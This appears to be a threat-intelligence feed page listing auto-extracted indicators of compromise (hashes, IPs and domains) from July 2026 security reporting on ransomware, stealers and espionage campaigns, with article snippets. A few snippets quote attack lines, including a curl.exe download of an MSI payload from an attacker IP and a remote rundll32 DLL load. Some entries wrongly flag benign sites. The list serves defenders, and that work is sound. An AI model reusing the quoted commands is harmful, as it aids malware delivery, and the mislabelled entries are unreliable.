ZeroHour

Indicators of compromise

4,250 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use

TypeIndicatorContextArticleFirst seen
sha25655a1eb4c2d3da04376df39d7ba832569c6af1a37a0cf2b95f754ac898023a30c0-9a-f]{16}.jsp Hash-check any suspicious JSP files against 55a1eb4c2d3da04376df39d7ba832569c6af1a37a0cf2b95f754ac898023a30c Check for flst.txt in /tmp or the Windchill working directoCISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue
The Hacker News
· Jul 25, 2026
domainwoocommerce-check.commin credentials and exfiltrate them to an external server ("woocommerce-check[.]com") that masquerades as WooCommerce, an open-source e-comme⚡ Weekly Recap: Chrome 0-Day, Data Wipers, Misused Tools and Zero
The Hacker News
· Jul 25, 2026
domainshutterstock.comresolve real threats faster Image credit: Celia Ong / CKA / Shutterstock.comChatGPT Among Top 10 Most Impersonated Brands in Phishing Attacks
Infosecurity Magazine
· Jul 24, 2026
domaineasysend.coom where the request is sent to a file-sharing service like EasySend[.]co to retrieve a ZIP archive. The ZIP file contains a VisualFake Notepad++ Plugin Delivers MATCHBOIL.V2 in UAC
The Hacker News
· Jul 24, 2026
domainhunt.iodifferent from Operation Roundish , which was disclosed by Hunt.io back in March and uses longstanding infrastructure that CERFake Notepad++ Plugin Delivers MATCHBOIL.V2 in UAC
The Hacker News
· Jul 24, 2026
domainis-01-ast.ols-img-12.workers.devng API. The binary contains a Cloudflare Workers endpoint (“is-01-ast[.]ols-img-12[.]workers[.]dev”), but rather than making HTTP connections to this doChaos ransomware deploys browser-based msaRAT to evade network detection
Security Affairs
· Jul 23, 2026
md52915b3f8b703eb744fc54c81f4a9c67fd393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 MD5: 2915b3f8b703eb744fc54c81f4a9c67f Talos Rep: https://talosintelligence.com/talos_file_reputatDon’t swing at everything
Cisco Talos
· Jul 23, 2026
md538de5b216c33833af710e88f7f64fc98bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f MD5: 38de5b216c33833af710e88f7f64fc98 Talos Rep: https://talosintelligence.com/talos_file_reputatDon’t swing at everything
Cisco Talos
· Jul 23, 2026
md5770dbe473180366d7b539ff2c188e551fd3730234d907a2a0d98e3e253a5f0e222e4e4bf3badb3fd6aea0a MD5: 770dbe473180366d7b539ff2c188e551 Talos Rep: https://talosintelligence.com/talos_file_reputatDon’t swing at everything
Cisco Talos
· Jul 23, 2026
md5c2efb2dcacba6d3ccc175b6ce1b7ed0ae6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a Talos Rep: https://talosintelligence.com/talos_file_reputatDon’t swing at everything
Cisco Talos
· Jul 23, 2026
md5dbd8dbecaa80795c135137d69921fdba05ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba MD5: dbd8dbecaa80795c135137d69921fdba Talos Rep: https://talosintelligence.com/talos_file_reputatDon’t swing at everything
Cisco Talos
· Jul 23, 2026
sha256633bd79d1efd3730234d907a2a0d98e3e253a5f0e222e4e4bf3badb3fd6aea0atection Name: W32.Variant:MalwareXgenMisc.29d4.1201 SHA256: 633bd79d1efd3730234d907a2a0d98e3e253a5f0e222e4e4bf3badb3fd6aea0a MD5: 770dbe473180366d7b539ff2c188e551 Talos Rep: https://taDon’t swing at everything
Cisco Talos
· Jul 23, 2026
sha25690b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59server_tcp.exe Detection Name: W32.Trojan.27oc.1201 SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a Talos Rep: https://taDon’t swing at everything
Cisco Talos
· Jul 23, 2026
sha2569896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7fD001.exe Detection Name: Win.Worm.Coinminer::1201** SHA256: 9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f MD5: 38de5b216c33833af710e88f7f64fc98 Talos Rep: https://taDon’t swing at everything
Cisco Talos
· Jul 23, 2026
sha2569f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507lware files from Talos telemetry over the past week SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 MD5: 2915b3f8b703eb744fc54c81f4a9c67f Talos Rep: https://taDon’t swing at everything
Cisco Talos
· Jul 23, 2026
sha256e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba-QAD.exe Detection Name: Win.Tool.Procpatcher::1201 SHA256: e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba MD5: dbd8dbecaa80795c135137d69921fdba Talos Rep: https://taDon’t swing at everything
Cisco Talos
· Jul 23, 2026
domainis-01-ast.ols-img-12.workers.devhes STUN and TURN configuration from a Cloudflare Worker at is-01-ast[.]ols-img-12[.]workers[.]dev , with Origin and Referer headers disguised as traffiChaos Ransomware Uses msaRAT to Route C2 Traffic Through Headless Chrome and Edge
The Hacker News
· Jul 23, 2026
domainclaude-pro.comther campaign impersonated Anthropic's Claude software from claude-pro[.]com, registered on March 28, 2026, serving a malicious MSI inChina-Nexus JadeProx Uses New TriBack Loader in Government and Healthcare Attacks
The Hacker News
· Jul 23, 2026
domaingouvvbo.top[.]com, license[.]claude-pro[.]com, sylverixstrategy[.]com, gouvvbo[.]top, vertextrust-advisors[.]com, and three security-vendor loChina-Nexus JadeProx Uses New TriBack Loader in Government and Healthcare Attacks
The Hacker News
· Jul 23, 2026
domainlicense.claude-pro.comr persistence. The Beagle backdoor it delivered reported to license[.]claude-pro[.]com. Sophos, working from the fake site, its hosting infrasChina-Nexus JadeProx Uses New TriBack Loader in Government and Healthcare Attacks
The Hacker News
· Jul 23, 2026
domainsylverixstrategy.comer's domains: claude-pro[.]com, license[.]claude-pro[.]com, sylverixstrategy[.]com, gouvvbo[.]top, vertextrust-advisors[.]com, and three secChina-Nexus JadeProx Uses New TriBack Loader in Government and Healthcare Attacks
The Hacker News
· Jul 23, 2026
domainupdate-crowdstrike.comity-vendor lookalikes sharing one IP, update-trellix[.]com, update-crowdstrike[.]com and update-sentinelone[.]com. The staging server was 43.1China-Nexus JadeProx Uses New TriBack Loader in Government and Healthcare Attacks
The Hacker News
· Jul 23, 2026
domainupdate-sentinelone.comone IP, update-trellix[.]com, update-crowdstrike[.]com and update-sentinelone[.]com. The staging server was 43.106.71[.]28 on port 8000. BothChina-Nexus JadeProx Uses New TriBack Loader in Government and Healthcare Attacks
The Hacker News
· Jul 23, 2026
domainupdate-trellix.com.]com, and three security-vendor lookalikes sharing one IP, update-trellix[.]com, update-crowdstrike[.]com and update-sentinelone[.]com. TChina-Nexus JadeProx Uses New TriBack Loader in Government and Healthcare Attacks
The Hacker News
· Jul 23, 2026
domainvertextrust-advisors.com[.]claude-pro[.]com, sylverixstrategy[.]com, gouvvbo[.]top, vertextrust-advisors[.]com, and three security-vendor lookalikes sharing one IP, updChina-Nexus JadeProx Uses New TriBack Loader in Government and Healthcare Attacks
The Hacker News
· Jul 23, 2026
domainrambler.rupreviously observed activity associated with the "ischhfd83@rambler[.]ru" email address, which has been tracked under the monikerAttackers Weaponize GitHub Actions Runners to Target cPanel and WHM Servers
The Hacker News
· Jul 23, 2026
domainglobal.turn.twilio.comcted host in order to traverse NAT, while the TURN server (“global.turn.twilio.com”) acts as a relay point when a direct Peer-to-Peer (P2P) coChaos ransomware's msaRAT: Living off the browser to build a covert C2 channel
Cisco Talos
· Jul 23, 2026
domainis-01-ast.ols-img-12.workers.devmation First, a GET request is sent to Cloudflare Workers (“is-01-ast[.]ols-img-12[.]workers[.]dev”) to retrieve the STUN/TURN server configuration requChaos ransomware's msaRAT: Living off the browser to build a covert C2 channel
Cisco Talos
· Jul 23, 2026
ipv4172.86.126.18this traffic will pass through undetected. curl.exe http://172.86.126.18:443/update_ms.msi -o C:\programdata\update_ms.msi The propeChaos ransomware's msaRAT: Living off the browser to build a covert C2 channel
Cisco Talos
· Jul 23, 2026
domaingoogle.comthe Google Account, go to the Selfie video page (myaccount.google[.]com/video-verification) Turn Improve Google services (optionaGoogle Adds Selfie Video Recovery for Users Locked Out of Their Accounts
The Hacker News
· Jul 23, 2026
domaindownload-app.usn redirected victims to an external domain, first claude.ai.download-app[.]us and subsequently downloading-api.it[.]com/html/claude/winHow attackers hosted a fake Claude download page on the claude.ai domain
Help Net Security
· Jul 23, 2026
domainit.comlaude.ai.download-app[.]us and subsequently downloading-api.it[.]com/html/claude/win , from which they downloaded a bundle. ItHow attackers hosted a fake Claude download page on the claude.ai domain
Help Net Security
· Jul 23, 2026
domainpolse.used to ten domains going back to December 2025. One of them, polse[.]us , was seized by Microsoft as part of Operation Endgame afHow attackers hosted a fake Claude download page on the claude.ai domain
Help Net Security
· Jul 23, 2026
domaincloudlanecdn.comil" , // Compromised target Microsoft 365 mailbox "Host" : "cloudlanecdn[.]com" , // DNS bootstrap domain "PublicKey" : "-----BEGIN RSANew Project CAV3RN .NET Native AOT communication module
Kaspersky Securelist
· Jul 22, 2026
domainindex.jss behavior. The repository contains a JavaScript file named index[.]js . This file is encoded in Base64 with an XOR cipher, whicPurpleBravo’s Targeting of the IT Software Supply Chain
Recorded Future
· Jul 22, 2026
domainlumanagi.onlinerecruiter sent a document via Google Docs purportedly from lumanagi[.]online that contained information about their project, the job vPurpleBravo’s Targeting of the IT Software Supply Chain
Recorded Future
· Jul 22, 2026
domainroutes.jsonas. This repository contained a similar malicious file to routes[.]js , which was observed in the Indian software development cPurpleBravo’s Targeting of the IT Software Supply Chain
Recorded Future
· Jul 22, 2026
urlhttp://154[n IDs targeted by the Chrome “auto” modes. UPLOAD0623URL = "hxxp://154[.]58[.]204[.]15:8080" # Change to your server MAX0623SLEEP =PurpleBravo’s Targeting of the IT Software Supply Chain
Recorded Future
· Jul 22, 2026
domaingobf.mxmpaign targeting Mexican users The MDR alert traced back to gobf[.]mx , a typosquat of the government's CURP national-ID lookupExposed Server Reveals AI-Assisted Phishing Toolkit Behind WebDAV Malware Campaign
The Hacker News
· Jul 21, 2026
domainsummerartcamp.netlosely enough that one recovered README preserved the exact summerartcamp[.]net@ssl@443\DavWWWRoot\OSYxaOjr example path from the originaExposed Server Reveals AI-Assisted Phishing Toolkit Behind WebDAV Malware Campaign
The Hacker News
· Jul 21, 2026
sha2568cb0c223b018cecef1d990ec81c67b826eb3c30d54f06193cf69969e9a8baea2it before any retraining can start. Binary SHA-256: packed 8cb0c223b018cecef1d990ec81c67b826eb3c30d54f06193cf69969e9a8baea2 ; unpacked ea7822eac6cecef7746c606b862b4d3034856caf754c4cf6New ENCFORGE Ransomware Targets AI Model Files in Langflow RCE Attack
The Hacker News
· Jul 21, 2026
sha256ea7822eac6cecef7746c606b862b4d3034856caf754c4cf69533662637905328f1d990ec81c67b826eb3c30d54f06193cf69969e9a8baea2 ; unpacked ea7822eac6cecef7746c606b862b4d3034856caf754c4cf69533662637905328 . Sysdig has published the source and C2 addresses, the embNew ENCFORGE Ransomware Targets AI Model Files in Langflow RCE Attack
The Hacker News
· Jul 21, 2026
domainacortaurl.coming on links concealed using URL shorteners like cort[.]as, acortaurl[.]com, and gtly[.]to. Blind Eagle makes use of compromised emaiBlind Eagle’s Five Clusters Target Colombia Using RATs, Phishing Lures, and Dynamic DNS Infra
The Hacker News
· Jul 20, 2026
domaincort.asts or clicking on links concealed using URL shorteners like cort[.]as, acortaurl[.]com, and gtly[.]to. Blind Eagle makes use ofBlind Eagle’s Five Clusters Target Colombia Using RATs, Phishing Lures, and Dynamic DNS Infra
The Hacker News
· Jul 20, 2026
domainduckdns.orgther enhanced by the use of dynamic DNS services, including duckdns[.]org, ip-ddns[.]com, and noip[.]com." The threat group has alsBlind Eagle’s Five Clusters Target Colombia Using RATs, Phishing Lures, and Dynamic DNS Infra
The Hacker News
· Jul 20, 2026
domaingtly.tod using URL shorteners like cort[.]as, acortaurl[.]com, and gtly[.]to. Blind Eagle makes use of compromised email accounts to sBlind Eagle’s Five Clusters Target Colombia Using RATs, Phishing Lures, and Dynamic DNS Infra
The Hacker News
· Jul 20, 2026
domainip-ddns.comy the use of dynamic DNS services, including duckdns[.]org, ip-ddns[.]com, and noip[.]com." The threat group has also taken advantaBlind Eagle’s Five Clusters Target Colombia Using RATs, Phishing Lures, and Dynamic DNS Infra
The Hacker News
· Jul 20, 2026
domainnoip.comc DNS services, including duckdns[.]org, ip-ddns[.]com, and noip[.]com." The threat group has also taken advantage of legitimateBlind Eagle’s Five Clusters Target Colombia Using RATs, Phishing Lures, and Dynamic DNS Infra
The Hacker News
· Jul 20, 2026
domaincloudlanecdn.comues from IPv6 AAAA records sent back by an attacker domain, cloudlanecdn[.]com , then writes them to logAzure.txt , a file dressed up asHollowGraph Malware Hides C2 and Stolen Files in Microsoft 365 Events Dated 2050
The Hacker News
· Jul 20, 2026
domainwp2shell.comlly, Searchlight Cyber has released a free scanning tool at wp2shell.com so that administrators can safely check if their servers reResearchers Build WordPress Exploit Using OpenAI's GPT
Infosecurity Magazine
· Jul 20, 2026
domaindisroot.orgdownload two payloads from a public Forgejo instance ("git.disroot[.]org/git-ecosystem"): a shell script ("deploy.sh") and a nativSleeperGem Uses Three Malicious RubyGems Packages to Target Developer Machines
The Hacker News
· Jul 20, 2026
domainmend.ioed them as a data exfiltration channel. Earlier this month, Mend.io disclosed details of an undocumented software supply chainSleeperGem Uses Three Malicious RubyGems Packages to Target Developer Machines
The Hacker News
· Jul 20, 2026
domainmicrosoft-toolkit.comg : Spoofing legitimate brand names with subtle variations (Microsoft-Toolkit[.]com vs MicrosoftToolkit[.]com) Context weaponization : EmbeddHow Threat Actors Are Rizzing Up Your AI for Profit
Recorded Future
· Jul 20, 2026
domainmicrosofttoolkit.comnd names with subtle variations (Microsoft-Toolkit[.]com vs MicrosoftToolkit[.]com) Context weaponization : Embedding malicious links withinHow Threat Actors Are Rizzing Up Your AI for Profit
Recorded Future
· Jul 20, 2026
domainsocket.ioware designed to exfiltrate valuable data and configuring a Socket.IO backdoor. Specifically, the repositories distributed as parFake Coding Tests Deliver OtterCookie-Aligned Malware Hidden in SVG Flag Images
The Hacker News
· Jul 19, 2026
domainsteamcommunity.comdata from an external server or from legitimate sites like steamcommunity[.]com. The use of ClickFix by the Kremlin-backed hacking crew mUAC-0145 Uses ClickFix CAPTCHAs to Infect Ukrainian Devices wih Malware
The Hacker News
· Jul 19, 2026
domaincdnorigin.netXLab's indicators are a C2 at 209.99.186[.]235, the domain cdnorigin[.]net, and one agent sample, SHA1 31c69b3e12936abca770d430066f3New NadMesh Botnet Hunts Exposed AI Services for Cloud Keys and Kubernetes Tokens
The Hacker News
· Jul 17, 2026
sha131c69b3e12936abca770d430066f379ec1d997ec235, the domain cdnorigin[.]net, and one agent sample, SHA1 31c69b3e12936abca770d430066f379ec1d997ec. The Hacker News covered a different operator working the sNew NadMesh Botnet Hunts Exposed AI Services for Cloud Keys and Kubernetes Tokens
The Hacker News
· Jul 17, 2026
md519f8befcb035f52bf70094e6b4f5779a483737EA3566726E51752DFF40 7F223EE0716CE2AD56F55D3744419449 19F8BEFCB035F52BF70094E6B4F5779A 846EF7C1C7323849B2A778C5E4CDA162 TmcLoader D08A059E8B815E3BGoSerpent backdoor attacks in Southeast Asia
Kaspersky Securelist
· Jul 17, 2026
md564e9d1950e42bc98486dfd9919463d1c95F97FBC ThumbcacheService CB6C4C70A3B171FA3404B8E1A3382116 64E9D1950E42BC98486DFD9919463D1C Stowaway CBBB6D483737EA3566726E51752DFF40 7F223EE0716CE2AD5GoSerpent backdoor attacks in Southeast Asia
Kaspersky Securelist
· Jul 17, 2026
md57f223ee0716ce2ad56f55d37444194498486DFD9919463D1C Stowaway CBBB6D483737EA3566726E51752DFF40 7F223EE0716CE2AD56F55D3744419449 19F8BEFCB035F52BF70094E6B4F5779A 846EF7C1C7323849B2A778C5E4GoSerpent backdoor attacks in Southeast Asia
Kaspersky Securelist
· Jul 17, 2026
md5846ef7c1c7323849b2a778c5e4cda162E0716CE2AD56F55D3744419449 19F8BEFCB035F52BF70094E6B4F5779A 846EF7C1C7323849B2A778C5E4CDA162 TmcLoader D08A059E8B815E3B891505BC8777FC28 93A1569D5D5AB2C4GoSerpent backdoor attacks in Southeast Asia
Kaspersky Securelist
· Jul 17, 2026
md593a1569d5d5ab2c4761fedf84f83709eB2A778C5E4CDA162 TmcLoader D08A059E8B815E3B891505BC8777FC28 93A1569D5D5AB2C4761FEDF84F83709E C2 IP addresses 152.32.160[.]239 8.220.194[.]108 8.220.214[GoSerpent backdoor attacks in Southeast Asia
Kaspersky Securelist
· Jul 17, 2026
md5cb6c4c70a3b171fa3404b8e1a33821166D8 McMx D6E86BF8A90E9B632ADD5FA495F97FBC ThumbcacheService CB6C4C70A3B171FA3404B8E1A3382116 64E9D1950E42BC98486DFD9919463D1C Stowaway CBBB6D483737EA356GoSerpent backdoor attacks in Southeast Asia
Kaspersky Securelist
· Jul 17, 2026
md5cbbb6d483737ea3566726e51752dff40A3404B8E1A3382116 64E9D1950E42BC98486DFD9919463D1C Stowaway CBBB6D483737EA3566726E51752DFF40 7F223EE0716CE2AD56F55D3744419449 19F8BEFCB035F52BF70094E6B4GoSerpent backdoor attacks in Southeast Asia
Kaspersky Securelist
· Jul 17, 2026
md5d08a059e8b815e3b891505bc8777fc28F70094E6B4F5779A 846EF7C1C7323849B2A778C5E4CDA162 TmcLoader D08A059E8B815E3B891505BC8777FC28 93A1569D5D5AB2C4761FEDF84F83709E C2 IP addresses 152.32.160GoSerpent backdoor attacks in Southeast Asia
Kaspersky Securelist
· Jul 17, 2026
md5d6e86bf8a90e9b632add5fa495f97fbcA690BCDB922F82E0BACC5 DC506FF7BB72735444FB3703A6BEE6D8 McMx D6E86BF8A90E9B632ADD5FA495F97FBC ThumbcacheService CB6C4C70A3B171FA3404B8E1A3382116 64E9D195GoSerpent backdoor attacks in Southeast Asia
Kaspersky Securelist
· Jul 17, 2026
md5dc506ff7bb72735444fb3703a6bee6d8mise File hashes GoSerpent EBFFD5A76AAA690BCDB922F82E0BACC5 DC506FF7BB72735444FB3703A6BEE6D8 McMx D6E86BF8A90E9B632ADD5FA495F97FBC ThumbcacheService CB6GoSerpent backdoor attacks in Southeast Asia
Kaspersky Securelist
· Jul 17, 2026
md5ebffd5a76aaa690bcdb922f82e0bacc5the future. Indicators of compromise File hashes GoSerpent EBFFD5A76AAA690BCDB922F82E0BACC5 DC506FF7BB72735444FB3703A6BEE6D8 McMx D6E86BF8A90E9B632ADD5GoSerpent backdoor attacks in Southeast Asia
Kaspersky Securelist
· Jul 17, 2026
domainpolygon-rpc.comtriggered via JSON-RPC to the public Polygon RPC endpoint “polygon-rpc[.]com”, targeting the smart contract “0x6ae382ed2154cc84c6672e4New Russian Campaign Uses Fake Webex and Zoom Installers to Deploy Starland RAT
Security Affairs
· Jul 17, 2026
domainclaude-desktop.gitlab.ioCR Stealer through fake Claude Code pages on GitLab such as claude-desktop[.]gitlab[.]io . The other chain leaves fingerprints Microsoft's firstACR Stealer Uses ClickFix Lures to Steal Browser Tokens and Microsoft 365 Files
The Hacker News
· Jul 17, 2026
domaincreativecommunityinfo.artes the lure. Two of the indicators in its Campaign 2 table, creativecommunityinfo[.]art and enhanceblabber[.]cc , are listed as a payload host anACR Stealer Uses ClickFix Lures to Steal Browser Tokens and Microsoft 365 Files
The Hacker News
· Jul 17, 2026
domainenhanceblabber.ccrs in its Campaign 2 table, creativecommunityinfo[.]art and enhanceblabber[.]cc , are listed as a payload host and a C2. The Hacker NewsACR Stealer Uses ClickFix Lures to Steal Browser Tokens and Microsoft 365 Files
The Hacker News
· Jul 17, 2026
domainin.net\Windows\system32\rundll32.exe" \\sphere-api.dialectosphere.in[.]net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe645ACR Stealer Uses ClickFix Lures to Steal Browser Tokens and Microsoft 365 Files
The Hacker News
· Jul 17, 2026
domaincodebasecode.comthe Telegram channel. By running a DNS query for the domain codebasecode[.]com, it extracts and decrypts the fallback C2 address. By extNew TELEPUZ Malware Spreads via ClickFix to Steal Data and Run Commands
The Hacker News
· Jul 17, 2026
domainhurgadatour.shope." Both the stager and main DLL binary are retrieved from "hurgadatour[.]shop" domain. Written in C, TELEPUZ is lightweight and modularNew TELEPUZ Malware Spreads via ClickFix to Steal Data and Run Commands
The Hacker News
· Jul 17, 2026
domaint.meBy extracting an encrypted URL from a Telegram profile's ("t[.]me/chanadarkpart") description. The channel was created on ANew TELEPUZ Malware Spreads via ClickFix to Steal Data and Run Commands
The Hacker News
· Jul 17, 2026
domainasp.netromising an internet-facing IIS web server and uploading an ASP.NET web shell. From there, they ran commands through the IIS woSpirals ransomware locks down victim systems in under 24 hours
Help Net Security
· Jul 17, 2026
md50398df5a18f71efcfeef4571a2cef577191050f9099c11c155b436863e9bc43bc904cdb842e249679aa35a MD5: 0398df5a18f71efcfeef4571a2cef577 Talos Rep: https://talosintelligence.com/talos_file_reputatBegun, the Patch Wars have
Cisco Talos
· Jul 16, 2026
md52915b3f8b703eb744fc54c81f4a9c67fd393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 MD5: 2915b3f8b703eb744fc54c81f4a9c67f Talos Rep: https://talosintelligence.com/talos_file_reputatBegun, the Patch Wars have
Cisco Talos
· Jul 16, 2026
md538de5b216c33833af710e88f7f64fc98bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f MD5: 38de5b216c33833af710e88f7f64fc98 Talos Rep: https://talosintelligence.com/talos_file_reputatBegun, the Patch Wars have
Cisco Talos
· Jul 16, 2026
md5c2efb2dcacba6d3ccc175b6ce1b7ed0ae6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a Talos Rep: https://talosintelligence.com/talos_file_reputatBegun, the Patch Wars have
Cisco Talos
· Jul 16, 2026
sha25690b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59-QAD.exe Detection Name: Win.Tool.Procpatcher::1201 SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a Talos Rep: https://taBegun, the Patch Wars have
Cisco Talos
· Jul 16, 2026
sha2569896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7fD001.exe Detection Name: Win.Worm.Coinminer::1201** SHA256: 9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f MD5: 38de5b216c33833af710e88f7f64fc98 Talos Rep: https://taBegun, the Patch Wars have
Cisco Talos
· Jul 16, 2026
sha2569f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507lware files from Talos telemetry over the past week SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 MD5: 2915b3f8b703eb744fc54c81f4a9c67f Talos Rep: https://taBegun, the Patch Wars have
Cisco Talos
· Jul 16, 2026
sha256b8be9a5e0a191050f9099c11c155b436863e9bc43bc904cdb842e249679aa35a0055df5.dll Detection Name: Auto.90B145.282358.in02 SHA256: b8be9a5e0a191050f9099c11c155b436863e9bc43bc904cdb842e249679aa35a MD5: 0398df5a18f71efcfeef4571a2cef577 Talos Rep: https://taBegun, the Patch Wars have
Cisco Talos
· Jul 16, 2026
domaindigikalas.onlineointing to an Iranian-hosted machine, and the parent domain digikalas[.]online resolves to Iran’s Arvan Cloud CDN. Shared dropper infrasTuxBot v3: The IoT Botnet Built With AI
Security Affairs
· Jul 16, 2026
domainaipythondevs.com[.]com” (which is also likely to be a hijacked domain) and “aipythondevs[.]com” serve as the primary C2 for the Starland Python RAT. AllUAT-11795 deploys novel Starland RAT and bespoke WLDR C2 implant in financially motivated campaign
Cisco Talos
· Jul 16, 2026
domaineorthopaedics.comitimate traffic categories. The staging domains, including “eorthopaedics[.]com” (likely a hijacked domain), “web-devtools[.]com” (resembUAT-11795 deploys novel Starland RAT and bespoke WLDR C2 implant in financially motivated campaign
Cisco Talos
· Jul 16, 2026
domainipify.orgincludes the victim's public IP address sourced from “api64.ipify[.]org”, the build name, region locale, computer name presentedUAT-11795 deploys novel Starland RAT and bespoke WLDR C2 implant in financially motivated campaign
Cisco Talos
· Jul 16, 2026
domainpolygon-rpc.comtriggered via JSON-RPC to the public Polygon RPC endpoint “polygon-rpc[.]com”, targeting the smart contract “0x6ae382ed2154cc84c6672e4UAT-11795 deploys novel Starland RAT and bespoke WLDR C2 implant in financially motivated campaign
Cisco Talos
· Jul 16, 2026
domainsastoro.comerving a narrow functional role: “eorthopaedics[.]com” and “sastoro[.]com” hosts the PowerShell stage chain under “/feed/” and “/alUAT-11795 deploys novel Starland RAT and bespoke WLDR C2 implant in financially motivated campaign
Cisco Talos
· Jul 16, 2026
domainweb-devtools.comncluding “eorthopaedics[.]com” (likely a hijacked domain), “web-devtools[.]com” (resembles a developer tooling portal), and “zynaris[.]iUAT-11795 deploys novel Starland RAT and bespoke WLDR C2 implant in financially motivated campaign
Cisco Talos
· Jul 16, 2026
domainwindowscreenrepairnearme.comC2 infrastructure used for the same campaign. The domains “windowscreenrepairnearme[.]com” (which is also likely to be a hijacked domain) and “aipyUAT-11795 deploys novel Starland RAT and bespoke WLDR C2 implant in financially motivated campaign
Cisco Talos
· Jul 16, 2026
domainzynaris.ioevtools[.]com” (resembles a developer tooling portal), and “zynaris[.]io” (resembles a technology start-up), with each domain servUAT-11795 deploys novel Starland RAT and bespoke WLDR C2 implant in financially motivated campaign
Cisco Talos
· Jul 16, 2026
domainhunt.iocause those two servers overlap with the TencShell cluster, Hunt.io assesses with moderate confidence that Gshell is a second CClaude Code and DeepSeek Powered Chinese Cyber Espionage Campaign
Security Affairs
· Jul 16, 2026
domainnasa.govion rather than as a confirmed breach. NASA hosts launchpad.nasa[.]gov and ngis.nasa[.]gov were logged in network scanning outpuClaude Code and DeepSeek Powered Chinese Cyber Espionage Campaign
Security Affairs
· Jul 16, 2026
domainbooking.comcredential-stealing malware by cybercriminals impersonating Booking.com. In a phishing campaign that began in December 2024 and hasPhishing campaign impersonating Booking.com targets hospitality sector with malware
The Record
· Jul 16, 2026
domainsysteminfor.comstomized PlugX payload that communicated with the C2 domain systeminfor[.]com. The document purported to be an official Vatican letterChinese State-Sponsored Group ‘RedDelta’ Targets the Vatican and Catholic Organizations
Recorded Future
· Jul 16, 2026
ipv482.114.160.93itional Netsweeper devices on YemenNet on two IP addresses: 82.114.160.93 and 82.114.160.94. The device identified on 82.114.160.98 wYemeni War Emphasizes Importance of Internet Control in Statecraft and Conflict/yemen-internet
Recorded Future
· Jul 16, 2026

Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.